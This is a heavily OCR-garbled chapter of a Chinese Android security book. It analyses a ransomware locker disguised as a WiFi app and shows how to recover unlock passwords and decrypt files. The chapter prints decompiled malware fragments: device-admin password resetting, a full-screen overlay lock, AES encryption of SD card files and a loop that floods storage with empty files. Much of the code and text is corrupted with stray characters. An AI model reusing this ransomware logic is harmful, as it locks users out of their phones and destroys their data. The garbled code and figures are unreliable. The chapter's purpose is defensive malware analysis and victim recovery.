如 此 之 多 ， 就 有 一 些 不 法 分 子 想 把 这 个 病毒 扩散 到 移动 设备 。 本 章 就 来 分 析 一 下 这 个 病毒 样本 程序 ， 并 给 出 防范 方法 。 


26.1 ”病毒 样本 分 析 


这 类 病毒 一 般 是 用 特殊 的 App 名 称 吸引 用 尸 下 载 ， 例 如 有 一 个 叫做 “魅影 WIFI|” 的 App， 下 载 安 委 之 后 界面 如 图 26-1 所 
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图 20-1 引诱 APP 
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清除 所 有 数据 
恢复 出 厂 训 置 对 ， 系 统 会 在 不 发 出 警告 的 
情况 下 清除 手机 上 的 数据 . 
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920-2 ”授权 界面 


如 果 点 击 “ 锁 定 屏幕 ”， 融 被 锁 屏 了 ， 解 锁 屏 幕 的 界面 如 图 26-3 所 示 。 


图 26-3 ”解锁 屏幕 


病毒 作者 做 了 一 个 浮 窗 锁 机 ， 让 用 户 通过 QQ 给 钱 。 这 时 我 们 不 得 不 看 代码 来 找到 这 个 密码 。 这 个 浮 窗 类 型 的 锁 机 其 实 很 容 
易 解 决 ， 主 要 是 借助 NindowManager， 所 以 连接 adb 使 用 命令 直接 杀 掉 这 个 进程 即 可 : am force-stop pkgname。 可 以 用 
dumpsys 命 令 获 取 其 包 和 名: 


D:“xadh shell dumpsus actiuitu top 
TASE com.;jk.mvafi id-45 
АСТІЏІТУ | con. jk.meifi4.Mainfictiuitu 4ideal"78 pid-6141 
Local Hctiuity 1d3H2eHdH State: 
mHezsumed-false mS5topped-true mPFinished-false 


然后 再 强制 停止 App: 


shellBBipisces=: 2 5 am force—-stop com.jk.mwifi 
=Һе110рі=се=: $ 


停止 乙 后 ， 发 现 解锁 屏幕 了 ， 但 密码 已 经 被 等 改 了 。 如 果 设 备 root 了 ， 直 接 删 除 /data/system/password.key 文 件 即 可 。 
当然 需要 用 户 本 身 融 是 个 开 上 有 者，“ 人 小 白 ” 用 户 肯定 没 办 法 。 下 面 就 来 分 析 App， 获 取 两 个 锁 机 密码 。 


26.2 ”获取 密码 


因为 我 们 知道 现在 大 多 数 锁 机 软件 都 是 利用 设备 管理 器 来 修改 设备 密码 的 ， 所 以 想 查 看 他 的 密码 可 直接 用 Jadx 打 开 软 件 ， 


然后 全 局 搜索 类 DeviceAdminReceiver， 如 图 26-4 所 示 。 


Search for text: 
DeviceAdminReceiver 
Search definitions of : 


| class [Method [| |Field |J|Code 


Node Code 
СЕ Иа android.app.admin. De 


(9 com. kh. MyAdnin public class MyAdmin extends 一 一 一 一 一 { 
& com h МуАЯтіл. MyAdmin() : void DeviceAdminReceiver deviceAdminReceiver = this; 


O com. h. MyAdmin. onEnabled (Context, Intent) : void DeviceAdminReceiver deviceAdminReceiver - this; 


图 26-4 ”用 Jadx 打 开 软 件 


看 看 这 个 类 里 面 修改 代码 部 分 逻辑 : 


public class MyAdmin extends DeviceAdminReceiver í 
public MyAdmin() í 
DeviceAdminReceiver deviceAdminReceiver = this; 


} 


@Омеггіде 

public CharSequence onDisableRequested(Context context, Intent intent) í 
Context context2 = context; 
Intent intent2 = intent; 
String num = Integer.toString(9815); 
getManager ( context2) . lockNow( ) ; 
boolean resetPassword = getManager(context2).resetPassword(num, 0); 
return super.onDisableRequested(context2, intent2); 


} 


()Override 
public void onEnabled(Context context, Intent intent) { 
DeviceAdminReceiver deviceAdminReceiver - this; 


Context context2 - context; AL Li 9815 


Intent intent4 - intent4; 

try { 
intent4 = new Intent(context2, Class.forName("com.h.s")); 
Intent intent5 - intent3; 
intent3 - intent5. ПЕСИНЕ СРР У 


be ЭНЕ: ——r nun, of); 


boolean resetPassword = 


} catch БЕСЕ п { 
Throwable th = 
ssi ansa cole NN noClassDefFoundError - r16; 
NoClassDefFoundError noClassDefFoundError2 - new NoClassDefFoundError(th.getMessage()); 
throw noClassDefFoundError; 


JAE, jxEEHSERESEM ABS SAUU VESTRE р9815 f , AMER Js АТА saa uB RD. 


2. 获 取 浮 窗 锁 机 密码 


ЗНО КАЛААДА, КАХ АЗАЛ, Рие ЖАЗЕЛ ЕУ, Aade BRRR, ја ғ 
符 串 “输入 密码 ”， 如 图 26-5 所 示 。 


Search for text: 


$^ E 


search definitions of 


[ Class [ |Methed [| |Field |V|Code 


llade Cade 


,ed.setHint 


图 26-5 “全 局 搜索 字符 串 “ 输 入 密码 


进入 下 面 这 个 类 即 可 : 


anager) application.getSystemService(Context.WINDOW SERVICE); 


› 
Is. ; ~L 
ылы е 1280; 


this.wmParams.gravity = 49; 浮 窗 级 别 最 5 ， 所 以 用 户 怎 ES A 么 操作 都 没 用 


this.wmParams.x = 0; 

this.wmParams.y = 9; 

this.wmParams.width = -1; 

this.wmParams.height = -1; 

this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(R.layout.newone, (ViewGroup) null); 
this.mWindowManager.addView(this.mFloatLlayout, this.wmParams); 


this.bt = (Button) this.mFloatLlayout.findViewById(R.id.bt); 
this.ed = (EditText) this.mFloatLlayout.findViewById(R.id.ed); 
this.tv = (TextView) this.mFloatLlayout.findViewById(R.id.tv); 
try { 


this.ed.setHint("S A ZB! "); 
re.tv.append(" 随 机 码 :"); 

} catch (Exception e) { 
Exception exception = е; 


} 


这 里 定义 了 一 个 Service， 然 后 用 WindowManager 实 现 ， 再 把 权限 设置 为 最 高 ， 用 户 就 无 法 进行 任何 操作 了 。 因 为 最 终 的 
密码 输入 都 是 在 EditText， 取 密码 作 比较 也 要 用 到 这 个 文本 框 ， 看 这 里 的 this.ed 在 哪里 取 值 : 


View View2 = view; 


try ( 
if ( 


—— this$0.ed. азер toString(). — 


r6. this$0. stopSelf(); 


) catch (Exception e) { 
Exception exception - e; 


9.this$0.des.decrypt(r9.this$0.share.getString("passw", "")))) { 
ə.mFloatLayout); 


xXx HUE БИХ Г, ЕТЕ О, MAM 
这 


} 个 Service， 下 面 分 析 这 个 加 密 算法 


这 里 直接 比 对 密码 ， 如 果 密 码 正确 了 ， 残 直接 去 抒 服 务 ， 浮 窗 锁 机 残 没 有 了 。 所 以 这 里 最 重要 的 是 decrypt 方 法 ， 它 是 从 SP 


中 拿 到 Key 为 passw 的 密 文 进行 解密 比 对 。 其 实 这 里 我 们 可 以 借助 Xposed 工 具 直接 hook 这 个 decrypt 方 法 ， 惑 能 很 轻易 获取 密码 
w 


if("com.jk.mwifi".equals(loadPackageParam.packageName))í 
XposedHelpers.findAndHookMethod("com.h.DU", loadPackageParam.classLoader, 
"decrypt", String.class, new XC MethodHook(í)1( 
QGOverride 
protected void beforeHookedMethod(MethodHookParam param) throws Throwable { 
Log.i("jw", "рагатѕ : "+рагат.агеѕ[0]); 
super .beforeHookedMethod (param) ; 
h 


QGOverride 

protected void afterHookedMethod(MethodHookParam param) throws Throwable { 
Log.i("jw", "result1:"«param.getResult()); 
super.afterHookedMethod(param) ; 


}); 
ZAIG El (J WLRI EAXXBOS ЛУ НУ Ч Т: 


D:*5adh logcat — ju 

= beginning of ¿“deuzZlasg/sustem 

— beginning of .deu^/logy^/main 

I Z ju <14462>: params:c2?fe56fa5?abBdhb | 这 就 是 解锁 密码 
I Z ju (144625: resulti xxx I 
I Z ju 144625: params:36414078648 
Iz ju (144625: resulti 
I^jwv (144625: paranms:e6BW8b6ba?77b41aic7a31f122840d55288a8243 7BJbe 7d4aalb5c 


178BHechb6hbhb?hbh62'7a7 


不 过 这 里 还 想 继续 分 析 这 个 DES 的 加 密 逻 辑 ， 因 为 目的 丈 是 要 学 习 的 ， 所 以 我 们 继续 手动 分 析 这 个 加 密 算法 ， 我 们 看 看 des 


xx Æ BJ dud 
ipee AL AE 
全 jJ = 可 能 
JE [V АЧ TR. 18 Л. 


I TER erak e) 1 T 7% Н Wo 
| Exception exception = e; 而 这 里 使 ШЧ 
rë_share = getSharedPreferences( "Flowers", 8); Pun 加 密 ， Jp 
rë_editor = r6.share.edit(); Z Nh key 


if (r6.share.getlong("m", (long) 8) == ((long) 8)) | к 
Editor ри опр = r8.editor.putbLlong("m", r6.pass); f. ЖШ 做 T 
boolean commit = r@.editor.commit(); P3 UK JII 22: 


这 里 会 看 到 有 一 个 du 和 du2 变 量 ， 不 要 人 在意 ， 可 能 是 代码 混淆 原因， 其 实 融 是 一 个 值 。 看 到 初始 化 传 入 一 个 字符 串 值 ， 可 
是 DES 加 密 的 key 值 ， 然 后 立即 对 一 个 密 文 进行 解密 ， 之 后 的 内 容 再 作为 新 的 DES 的 密 钥 值 ， 相 当 于 这 里 二 次 获取 密 钥 了 。 看 


一 下 DU 代码 实现 : 


public class DU í 
private static String strDefaultKey = “national”; 
private Cipher decryptCipher; 
private Cipher encryptCipher; 


public DU() throws Exception í 
this(strDefaultKey); 
} x 
I< ER BJ) ҮТ 
public DU(String str) { „в èb B | 
String str2 = str; 申 Do ле DES 加 


DU du = this; 密 的 key 值 
this.encryptCipher = (Cipher) null; / 
раро crm acad = (Cipher) null; 


re. — er = Cipher.getInstance("DES"”); 
rð.encryptCipher.init(1, key); 
re.decryptCipher = Cipher.getInstance("DES"”); 
re.decryptCipher.init(2, key); 

y catch (Exception e) í 
e.printStackTrace(); 

1 


传 入 的 字符 串 瓯 是 作为 key 进 行 加 解密 操作 的 ， 那 么 下 面 我 们 融 需 要 手动 写 一 个 简单 的 PDFEs 加 解密 算法 : 


public class DES { 


private static final String DES = "DES"; 


private static final String |CRYPT KEY 


第 一 次 初始 化 密 钥 是 字符 串 "flower" ， 然 后 直接 解密 内 容 "c29fe56fa59ab0db ": 


public static void main(String[] args) { 
String ID = "c29fe56fa59abedb"; 


String idDecrypt = decrypt(ID); 
System.out.println("originkey:" 


); 


图 Console 2 i*! Problems ZD LogCat [B Signing and Keys | 
«terminated» DES [Java Application] C:\Program FilesYava\jre1.8.0_92\bin\javaw.exe (201; 


originkey[xxx ] 


获取 第 二 次 要 用 到 的 密 钥 "xxx"， 然 后 再 初始 化 以 下 key: 
public class DES { 
private static final String DES = "DES"; 


private static final String CRYPT_KEY = "xxx"; 


我 们 需要 去 程序 的 XML 中 找到 加 密 内 容 ， 再 拷贝 出 来 进行 解密 : 


D:"N2>adh shell 

-?7-[r-«[999;999H-*I[6n*8shellÜ8pisces:^/ $ 

shell8pisces:^/ $ su 
-?-[r-[999;999H-«[6n*8root(pisces:^/ t 

rootü?pisces:/ H cd /data/data/com. jk.muifi 
rootü?pisces:/data/data/com.jk.muvifi H ls 

cache 

lib 

shared prefs 

root?pisces:/data/data/com.jk.mveifi # cd shared prefs^/ ХЕ 2 f ЛП 22: 
rooti^pisces:/data/data/com.jk.muvifi^/shared prefs W ls 


RUE y xml 之 后 的 内 容 
gs b ШЕ -.xml 


t Flovers.xml 
€«?xml version-'i1.8' encoding-'utf-8' standalone-'yes' ? 
«long name="m" value= 


<map>? 
iri rd 5 
&/nap» 


€string name-"passu'. 
rootüpisces:/data/data/com.jk.mvifi^/shared prefs # m 


把 这 个 串 拷 贝 出 来 进行 解密 : 


public static void main(String[] args) í 
String ID = "3641d786d8bdb@0f17@@ecb6bb7b627a9"; 


String idDecrypt = decrypt(ID); 
System.out.println("originkey:"+idDecrypt); 


Ë) Console X le] Problems ZD LogCat [BÍ Signing and Keys | 
«terminated» DES [Java Application] C:\Program FilesYava\jre1.8.0_92\bin\javaw.exe (2017 年 7, 


originkey 


这 就 是 解锁 密码 了 ， 我 们 回 过 头 看 看 是 怎么 把 这 个 加 密 捉 存 到 XML 中 的 : 


this.pass = (long) (Math.random() * ((double) 100000000) ); 
Long 1 = г12; 
о " 


DU FÉ = г10; 
DU du2 = new DU( "f lower"); 
this.des - du; 
Context context - this; 
try { 
du = r10; 
du2 = new DU(r@.des.decrypt("c29fe56fa59ab@db”)); 
context.des = du; 
y catch (Exception e) í 
Exception exception = e; 


这 里 的 加 密 算 法 也 很 简单 ， 密 人 码 就 
是 随机 数 ， 然 后 再 加 上 123456 进行 
DES 加 密 保 存 到 XML 中 。 而 这 个 
随机 数 也 会 被 存 人 XML 中 


} 

гд.ѕһаге = getSharedPreferences("Flowers", 0); 

гд.едіїог = r@.share.edit(); 

if re. share.getLong( "п", (long == (long д 
гд.раѕ5); 


StringBuffer stringBuffer = г10; 

StringBuffer stringBuffer2 = пем StringBuffer(); 

putLong = r@.editor.putString("passw", du2.encrypt(stringBuffer.append(”"”).append(r@.passw).toString())); 
commit = r@.editor.commit(); 


这 里 生成 密码 竟然 采用 的 是 随机 值 ， 然 后 再 加 上 123456， 最 后 进行 DES 加 密 保存 到 XML 中 ， 同 时 也 把 随机 数 保 存 到 XML 
中 。 从 上 面 可 以 看 到 值 是 : 


стар > 
{string namne-'passwuw'' уңышын hui Ru lue: Á|string? 


«long name="m" value= 


<A map > 
vrootEBpisces:rdatardatarcom.jk- көл E E E n»eft H 。 


这 个 值 加 上 123456 就 是 密码 了 : 92944926+123456=93068382， 这 也 是 上 面 我 们 解密 之 后 的 密码 。 如 果 “ 小 白 ” 用 户 加 


他 QQ 款 要 密码 ， 其 实 他 是 需要 让 小 日 用 户 做 点 乐 西 ， 因 为 这 个 密码 是 随机 的 ， 不 是 固定 值 ， 所 以 “小 日 ”用 户 需 要 把 程序 的 
XMLx 文 件 给 他 ， 不 然 他 也 不 知道 解锁 密 


263 ”文件 解密 


上 面 的 锁 机 还 不 是 重点 ， 这 个 病毒 的 重点 其 实 是 文件 加 密 。 在 本 章 开始 的 图 26-1 中 ， 如 果 氮 击 “ 注 册 使 用 ”， 会 出 现 如 图 
26-6 所 示 的 勒 达 界面 。 


ЖЕТИ иисти 


EM S :863970029764198 


moq het 


图 26-6 ”勒索 界面 
点 击 “注册 软件 ”， 会 等 一 会 儿 ， 其 实 这 里 他 在 做 一 些 坏事 ， 然 后 出 现 提 示 界 面 ， 如 图 26-7 所 示 。 


这 就 是 Wannacry 病 毒 界面 ， 需 要 付 钱 才能 对 文件 解密 。 而 这 时 手机 设备 SD 卡 中 的 文件 已 经 被 全 部 加 密 了 ， 如 图 26-8 所 


Ë] | 
2 
o 


最 糟 糙 的 是 ， 可 能 3D 卡 都 打 不 开 了 ， 这 是 因为 病毒 制作 者 无 限制 地 新 建 一 些 文 件 和 文件 夹 到 9D 中 。 可 以 友 现 ， 每 个 文件 都 
是 0 字 节 ， 然 后 文件 对 应 一 个 空 文件 夹 。 


x= 14 НП ax AA "T um — Pi: 

"р F гер үг р" Ë j г 

T IIb Zl 
He 日 E. = =. | "ing Г -= " 


| 2282981593 гів? 625238597 


和 手机 的 所 有 文件 已 被 我 加 密 了 


到 的 手机 出 了 什么 问题 ? 


-ELESPE Ta РЕЗЕ ЗЕЕ ТЕТЕ T. 

WA, WS. Xf. Em8., з, DPBDEX 
ЖЫ АРАН SS Ч ВЕЛЕ ЕУ ЛЕ. ОЈ b, 3k E 
去 文 忻 管理 看 看 。 
Н ВОЕНА ЖЛ ЕЕ лі. ЖЖ ар E 131 
ZWEITE, ЦОЯ ЦЕ, AAE RIRE S wz. 
RERET HET TENAR, QOQ390870570 


АТ ох ЕРЫ НЈУ ? 


и Јр рр E. ГАЕТ Ж Ү{ПЕЗ Н БЕН га ВЕ 
X. ЗАСЛ НАРТ, ЙЕНЕ ЕКЕ ЕН ЕНШЕ 55. 


ЖЕНЕН САЛЕ ЕНДА, MARN, РА 
JEE EET [8] ER TS 3 Hp T3. 
BirIE—XPIBBEH.SIIXHEHRBEHBL. 
ТТЕ — DRLFEESTIER , AURKERA D 

I. QQ3SDBTO57ü 


图 26-7 ”提示 界面 


1.07GB 已 用 , 8.02GB 可 用 , r/w 


eS БЕЯ 


+!-6.00390870570У {FB DI , 15271 
ХЕ, 00390870570 


197H 17 16:53:34 16 字 节 rw-rw— 


+!-6 文 件 已 被 加 密 QQ390870570 


| 19 7 月 17 16:32:58. rwxrwx— 


+L=;.QQ390870570 文 件 已 加 密 ， 请 勿 部 
载 软件 , 00390870570 


197 月 17 16:43:23 16 字 节 rw-rw— 


{мє +!-=; 文 件 已 被 加 密 QQ390870570 


19 7 有 17 16:28:53 rwxrwx— 


+l-aQQ390870570 文 件 已 加 蜜 ， 请 勿 部 
载 软 件 00390870570 
1978 17 15:51:06 16 ŽP rw-rw— 


E *--ax rp 48708:00390870570 


19 7 月 17 16:31:55 rwxrwx— 


”+!-d.QQ390870570 文 件 已 加 密 ， 请 勿 和 
2) жк, QQ390870570 


图 26-8 ЖХ Л 


下 面 来 分 析 病 毒 代码 : 


D:*»adb shell dumpsys activity top 
TASK conm.jk. muifi id 二 一 
ACTIVITY Eon. jk-nwifi7con-android.crypt-Locküctivity 41ac3758 рїа-2464й 
Local Activity aell 
mResumed=true Stopped= аи ДЫЙ mFinished=false 
mLoadersStarted=true 
mChangingConfigurations-false 


进入 这 个 类 看 看 ， 在 onCreate 方 法 中 看 到 几 个 方法 : 


@Override 
protected void onCreate(Bundle bundle) í 
Bundle bundle2 = bundle; 
ADRTLogCatReader.onContext(this, "com.aide.ui"); 
super.onCreate(bundle2); 
setContentView(R.layout.main); 
try i 
setWallpaper(((BitmapDrawable) getResources().getDrawable(R.drawable.icon) 
y catch (IOException e) í 
IOException iOException - e; 


} 
getView(); 
KE 在 这 里 二 了 坏事 


time2go(); 


ridi d 


Button itm = rO0.DecryptButton; 
AnonymousClass100000000 anonymousClass100000000 = r12; 
AnonymousClass100000000 anonymousClass1000000002 = new OnClickListener(r9) í 


11 


2 ЕЕ: 


boolean commit = AnonymousClass100000002.access$O(this.this$0).sp.edit().putI 
if (AnonymousClass100000002.access$O(this.this$0).timetofinish == д) í 


AnonymousClass100000002.access$0(r0.this$0).boom(); 


LockActivity access$0 = AnonymousClass100000002.access$O(r0.this$0); 
access$0.timetofinish--; 


有 一 个 可 怕 的 “爆炸 ”方法 : 


public void run() í 

AnonymousClass100000005 anonymousClass100000005 = this; 

while (true) í 
boolean createNewFile; 
int nextInt = anonymousClass100000005.this$@.a.nextInt(99999999); 
File Tile = r11; 
StringBuffer stringBuffer = r11; 
StringBuffer stringBuffer2 = new StringBuffer(); 
stringBuffer2 = r11; 
StringBuffer stringBuffer3 = new StringBuffer(); 
File file2 = new File(stringBuffer.append(stringBuffer2.append(LockActivity.path).append(Integer.toString(nextInt 
File file3 = file; 


if (!file3.exists()) í "S Я * s 
i ae ЖЕЙТ Y —1ЧЕРКЫ SENER 
IOException iOException = е; 
} 
} 
file = r11; 
stringBuffer = r11; 
stringBuffer2 = new StringBuffer(); 
file2 = new File(stringBuffer.append(LockActivity.path).append(Integer.toString(nextInt)).toString()); 
createNewFile = file.mkdir(); | 


CERERI ВУАН, IXERRBJSD-ESURUEJVETIAJGTI, FERR У. 


文件 加 密 在 程序 启动 的 时 候 束 做 了 ， 在 MainActivity 中 : 


button2.setOnClickListener(anonymousClass100000001); 

Thread thread = r13; 

AnonymousClass100000002 anonymousClass100000002 = r13; 

AnonymousClass100000002 anonymousClass1000000022 = new Runnable(this) í 
private final MainActivity this$0; 


{ 
AnonymousClass100000002 anonymousClass100000002 = this; 


this.this$@0 = гб; 
} 


static MainActivity access$0(AnonymousClass100000002 anonymousClass100000002) í 
return anonymousClass100000002.this$0; 


) xx HL sJ; Zi c fF SS Е, 
—— 然后 也 是 用 了 一 个 “爆炸 ” 
public void run() { РА 方法 往 SD 卡 中 与 人 大 量 的 


MainActivity mainActivity = this.this$0; A 

File file = r6; A AFRIN 
File file2 = new File(Environment.getExternalStorageDirectory().getPath()); 
boolean access$1000026 - mainActivity.EncryptFile(file); 


this.this$0.boom(); 


t 


然后 跟踪 这 个 方法 : 


tH. 


者 是 


private boolean EncryptFile(File file) { 


MainActivity mainActivity = this; 如 果 是 他 自己 创建 出 来 的 空 文件 和 
File[] listFiles = file.listFiles(); РЧА 
if (listFiles 1= null) í 25 ЖҮР, ЛЕДИ 


File[] fileArr = listFiles; 
for (File file2 : fileArr) í 
if (file2.isDirectory()) í 
boolean EncryptFile = EncryptFile(file2); 
) else if (file2.getAbsolutePath().indexOf(" УП, AMEIR. 00390870570") == -1) í 
long currentTimeMillis = System.currentTimeMillis(); 
FormetFileSize(getFileSize(file2), file2, true); 
long currentTimeMillis2 = System.currentTimeMillis(); 
PrintStream printStream = System.out; 
StringBuffer stringBuffer = г20; 
StringBuffer stringBuffer2 = new StringBuffer(); 
printStream.println(stringBuffer.append(String.valueOf((currentTimeMillis2 - currentTimeM: 


} 
} 


return true; 


一 一 


这 里 会 过 滤 他 目 己 创建 出 来 的 空 文件 和 空 文件 夹 不 进行 加 密 ， 继 续 看 代码 : 


public static void FormetFileSize(long j, File file, boolean z) { 
long j2 = j; 
File file2 = file; 
boolean z2 = z; 
AES aes = r14; 
AES aes2 = new AES(); 
AES aes3 = aes; 


DecimalFormat decimalFormat = r14; 这 是 文件 加 密 

DecimalFormat decimalFormat2 = new DecimalFormat( 5.00"); | 

DecimalFormat decimalFormat3 = decimalFormat; 这 是 文件 解密 
boolean delete; 

if (z2) ( 


if (Float.valueOf(decimalFormat3.format(((double) j2) / ((double)fficcessibilityEventCompg 
String encrypt - AES.encrypt(text, pass); 
String file3 - file2.toString(); 

"ias зан кз = = г14; 


ТҮРЕ TOUCH INT 


FiletncryptUtils. ванага files, stringBuffer.agpend( #2 .toString()).append(" X + 5312: 


delete - file2.delete(); 


Jouble) AccessibilityEventCompat.TYPE TOUCH 
.toString(), file2.toString().split(": ўе 


e 


过 万 法 的 最 后 一 个 参数 来 判断 是 加 密 文 件 还 是 解密 文件 。 加 解密 万 法 参数 都 是 类 似 的 ， 第 一 个 参数 是 AES 加 解密 的 密 
到 这 里 我 们 大 致 清楚 了 这 个 病毒 是 用 AES 对 文件 进行 加 密 的 ， 而 密 钥 又 用 AES 加 密 。 这 时 加 密 的 key 和 内 容 是 


static String pass = "F7A3B9D65C32E52"”; 
public static String path; 
static String text = "BAE3FS8CA7B5"; 


分 析 到 这 里 ， 我 们 融 可 以 开始 手动 解密 文件 了 。 当 然 有 很 多 种 方法 : 


第 一 种 方法 : 借助 Xposed 工 具 直接 hook 他 的 FormetFileSize 方 法 ， 因 为 从 上 面 的 分 析 知 道 ， 这 个 方法 的 最 后 一 个 参数 标志 
解密 文件 还 是 加 密 文 件 ， 拦 截 这 个 方法 之 后 ， 修 改 这 个 参数 状态 为 false 表 示 是 解密 文件 : 


п]: 


XposedHelpers.findAndHookMethod("com.jk.mwifi.MainActivity", loadPackageParam.classLoader, 


SREE", long.class, File.class, boolean.class, new XC MethodHook()( 


QGOverride 


косы void beforeHookedMethod(MethodHookParam param) throws Throwable { 
"FrometFileSize params:"*param.args[0]-*", 


@Override 


+param.args[1]+", 


protected void afterHookedMethod(MethodHookPar'am param) throws Throwable í 


super . afterHookedMethod(param); 
] 


Hs 


第 二 种 方法 : 把 他 的 解密 功能 代码 拷贝 出 来 ， 目 己 写 一 个 解密 程序 ， 这 比较 


4 os AndroidDemo 


4 $9 src 
4 HB cn.wjdiankong.androiddemo 
> ДЙ AESjava 
> jJ) AESUtils.java 
> Д0 Base64Utils.java 


> (P leEncypttisjavs| 
> [Й MainActivity.java 

> [А ShellUtils.java 

> [ЛД Utilsjava 


因为 他 的 代码 这 几 个 类 都 比较 独立 ， 所 以 直接 拷贝 出 来 不 会 有 太 多 的 错误 ， 


private boolean DecryptFile(File file) í 
File[] listFiles = file.listFiles(); 
if (listFiles != null) { 
File[] fileArr = listFiles; 
for (File file2 : fileArr) í 
if (file2.isDirectory()) í 
DecryptFile(file2); 
) else í 
long currentTimeMillis = Sy 
FileEncryptUtils.decryptFile 
long currentTimeMillis2 = System. 


Log.i("jw", "decrypt file:" |+ file2. SHORE LY + "Els: A current] 


} 
} 


return true; 


下 面 台 开始 运行 这 个 程序 ， 这 里 为 了 操作 不 溪 费 时 间 ， 把 3D 卡 清空 了 ， 然 后 写 入 三 个 


*param.args[2]); 


适合 给 中 招 的 “小 日 ”使 用 : 


而 错误 就 


是 变量 定义 重复 


简单 的 文件 ， 


file2.to: 


， 目 己 手动 改 一 下 即 


让 他 加 密 : 


D:*»adb shell 
7*[r-[999;999H*I6n*8shell?8pisces:/ $ 
сҺһе110ріѕсеѕ:/ $ su 
7*[r-[999;999H-*[6n*8rootÜpisces:/^/ WW 
oot? pisces:/ # cd sdcard 
ootÜ?pisces:/sdcard # echo 
ootÜ?pisces:/sdcard # echo 
oot? pisces:/sdcard # echo 
oot? pisces:/sdcard # ls 
368Loqg 

Android 

Download 

encent 

backups 

inguserdown 

yi.txt 

y2.txt 

y3.txt 

oo0t@pisces:/sdcard # ls 
368Loqg 

Android 

Download 

encent 

backups 

kinguserdown 


yi . Єх pK A RE 
y2. ee ОЕ ү. B 
3 .七 Xt E gs li 


JETS Б RUBER QQ390870570 

"c wien "32e irootepisces: /sdcard # 15 
368Loq 

Android 

Download 

encent 

backups 

kinguserdown 

yi.txt 

y2.txt 

y3.txt 
ootl?^pisces-/sdcarc 

i am fourbrother 

oot pisces:/sdcard W 


yx 写 入 儿 个 文件 给 他 加 密 


"i am fourbrother" > mul .txt 
"i am fourbrother" > my2 .txt 
"i am fourbrother" 


> my3.txt 


加 密 之 后 的 文件 内 容 也 被 加 密 了 
Pd 


文 里 已 经 用 程序 进行 解密 


м 这 了 ， 看 到 了 正确 的 内 容 


cat mu 


27:52111, (ЕЛП RB E WEB (65 T 'EBIUD,, 
始 文 件 ， 从 他 的 代码 中 也 可 以 看 到 这 点 : 


lse if (Float.valueOf(decimalFormat3.format(((double) j2) / ((double) AccessibilityEventCom 
FileEncryptUtils.decryptFile(AES.encrypt(text, pass), file2.toString(), file2.toString()]J]split("X 


delete = file2.delete(); X TEX WE 7 一 ITE p 
HITTA! 


pat. TYPE TOUCH INTERACTION START .floatValue() 
00390870570") [0] .t 


锋 取 原始 文件 名 


然后 运行 我 们 的 解密 程序 ， 看 到 日 志 : 


jw path: /storage/emulated/0 

cn.wjdiankong.androiddemo jw decrypt file:Androidtime:03s 

cn.wjdiankong.androiddemo jw decrypt file:lmmplugins.zip 文 件 已 加 密 ， 请 勿 鲫 载 软件 ，QQ3 
cn.wjdiankong.androiddemo jw decrypt file:record.datX-#FELDbBSE, i27980$2$kfF. QQ3908 
cn.wjdiankong.androiddemo jw decrypt file:.confd tit EWE. WAR. 0039087057 
cn.wjdiankong.androiddemo jw decrypt file: .confd-journal 文 件 已 加 密 ， 请 勿 鲫 载 软件 ，QQ 
cn.wjdiankong.androiddemo jw decrypt file: -timestamp 文 件 已 加 密 ， 请 勿 鲫 载 软件 ，0QQ3908 
cn.wjdiankong.androiddemo jw decrypt file:.cuid2 文 件 已 加 密 ， 请 勿 卸载 软件 ，QQ39087057 
cn.wjdiankong.androiddemo jw decrypt file: .cuid 文 件 已 加 密 ， 请 勿 卸载 软件 ，QQ390870570 
cn.wjdiankong.androiddemo jw decrypt file:myl.txt 文 件 已 加 密 ， 请 勿 邱 载 软件 ，QQ3908705 
cn.wjdiankong.androiddemo jw decrypt file:my2.txto = 1И1Ж. i$27980$29X«fF. 003908705 
cn.wjdiankong.androiddemo jw decrypt file:myY3.txt 文 件 已 加 密 ， 请 勿 卸载 软件 ，QQ3908705 


到 这 里 ， 我 们 就 成 功 进 


I 


ET. 


26.4 ”病毒 分 析 报 告 


这 个 病毒 作者 锁 机 采用 了 两 套 机 制 ， 而 且 浮 窗 锁 机 还 用 随机 密码 志 人 。 最 可 恨 的 是 他 竟然 在 3?D 中 创建 了 那么 多 的 空 文件 和 
空 文件 夹 ， 让 设备 无 法 使 用 。 最 后 他 用 的 是 AEs 算 法 对 文件 进行 加 解密 操作 。 这 里 没有 采用 RSA 加 密 的 原因 是 RSA 加 密 算法 非常 
耗 时 县 “ 吃 内 存 ”， 手 机 会 打 不 住 的 。 所 以 只 好 用 AES 了 ， 但 是 对 于 解密 来 说 只 要 知道 密 钥 即 可 。 这 里 解密 用 两 种 方式 : 一 种 是 
用 Xposed 框 架 进行 hook， 一 种 是 自己 把 他 的 界面 代码 拷贝 出 来 写 一 个 解密 程序 。 当 然 第 二 种 是 最 优 的 ， 因 为 那些 中 招 的 “小 
日 ”有 用户 是 没有 root 的 ， 也 没有 安 疼 Xposed 框 娘 的 ， 只 有 写 一 个 解密 程序 给 他 安 半 进行 解密 葡 好 了 。 不 过 有 个 很 大 的 问题 ， 融 
是 因为 病毒 还 创建 了 很 多 空 文件 和 空 文件 夹 ， 导 致 操作 的 时 候 需要 区 别 对 待 。 要 做 一 次 过 滤 ， 这 泽 病毒 目 己 生成 的 文件 和 文件 夹 
束 不 要 做 解密 了 ， 不 然 会 无 限制 死机 。 


从 这 个 病毒 中 我 们 可 以 了 解 到 关于 锁 机 策略 的 机 制 ， 对 于 设备 管理 器 的 锁 机 直接 找到 DeviceAdminReceiver 这 个 类 就 好 
了 ， 或 者 直接 看 XML 中 的 定义 : 


<receiver. android:name 
<meta-data android:name="android.app.device admin" android:resource="@xml/my_admin" /> 
<imtent-filter> 


<јгесеімег> 


快速 找到 修改 密码 的 地 方 ， 找 到 锁 机 密码 即 可 。 而 对 于 浮 窗 锁 机 ， 因 为 都 是 采用 Service 和 WindowManager 来 实现 逻辑 
的 ， 所 以 直接 使 用 am 命令 强制 停止 程序 运行 即 可 。 
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面 对 这 个 病毒 ， 即 使 你 付费 了 ， 病 毒 制作 者 帮 你 解密 了 ， 也 是 很 麻烦 的 ， 因 为 病毒 制作 者 创建 了 那么 多 文件 ， 删 除 操作 需 
时 间 ， 解 冤 还 消耗 机 器 性 能 。 所 以 遇 到 这 种 病毒 千 万 不 要 给 钱 ， 可 以 自己 解 黎 ， 或 者 刷机 。 最 重要 的 一 点 就 是 千 万 不 要 去 下 载 来 
历 不 明 的 App， 去 正规 的 应 用 市 场 下 载 应 用 是 最 保险 的 。 


